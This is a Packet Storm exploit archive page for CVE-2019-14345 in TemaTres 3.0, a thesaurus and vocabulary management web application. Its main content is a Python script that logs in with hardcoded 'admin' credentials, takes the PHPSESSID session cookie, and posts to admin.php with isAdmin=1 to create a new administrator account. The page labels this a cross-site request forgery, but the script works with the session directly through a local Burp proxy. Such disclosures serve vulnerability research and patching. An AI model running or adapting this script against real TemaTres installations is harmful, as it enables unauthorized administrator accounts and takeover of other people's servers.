what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TemaTres 3.0 Cross Site Request Forgery

TemaTres 3.0 Cross Site Request Forgery
Posted Nov 18, 2019
Authored by Pablo Santiago

TemaTres version 3.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 408ad091dca69f3df8a0708da1fd8237ab74307022117bec085217d142968b7d
Download | Favorite | View

TemaTres 3.0 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10

# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.

#Exploit

import requests
import sys

session = requests.Session()

http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"

proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}

url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
‘id_password’: ‘admin’,
‘task’:’login’}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]

print (cookie)

host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)

if (password == password2):
#configure proxy burp

data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’

}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/tematres/vocab/admin.php’, data=data,
headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))

else:
print (‘Passwords dont match!!!’)
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close